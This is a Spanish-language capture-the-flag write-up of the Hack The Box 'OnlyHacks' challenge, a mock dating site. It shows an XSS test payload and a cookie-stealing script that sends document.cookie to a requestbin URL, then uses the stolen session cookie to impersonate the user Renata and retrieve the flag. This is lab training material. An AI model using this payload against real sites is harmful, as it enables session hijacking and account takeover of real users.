Post

OnlyHacks

Dating and matching can be exciting especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

OnlyHacks

Web Analysis

El sitio web simula una plataforma de citas donde es necesario registrarse y autenticarse para acceder a funcionalidades internas.

Una vez dentro, en la sección Dashboard se pueden aceptar matches y en la sección Matches se accede a un sistema de mensajería con distintos usuarios. En particular, se encuentra un chat activo con el usuario Renata.

Probando la funcionalidad del chat, envío el payload <script>alert(1)</script>. Al ser procesado y renderizado, el navegador ejecuta el alert, confirmando la presencia de una vulnerabilidad de Cross-Site Scripting.


Vulnerability Exploitation

El sitio requestbin permite generar una URL que registra y muestra las solicitudes HTTP recibidas, útil para capturar información del cliente que interactúa con ella.

Para activar el endpoint generado, realizo una solicitud con curl.

1
2
/home/kali/Documents/htb/challenges/onlyhacks:-$ curl -X POST -d "fizz=buzz" http://requestbin.whapi.cloud/1lxcu131
ok

Con esto verificado, construyo un payload XSS que envía las cookies de la víctima al endpoint generado.

1
<script>document.location='http://requestbin.whapi.cloud/1lxcu131?c='+document.cookie</script>

Envío este payload por el chat con Renata y espero la solicitud desde el panel de requestbin.

Una vez capturada la sesión, tomo el valor de la cookie session y la sustituyo desde DevTools para suplantar la identidad de Renata.

Al recargar la página, accedo al panel como el usuario Renata. Desde allí, puedo ver tanto el chat conmigo como una conversación con otro usuario que contiene la flag.

OnlyHacks Challenge from Hack The Box has been Pwned

This post is licensed under CC BY 4.0 by the author.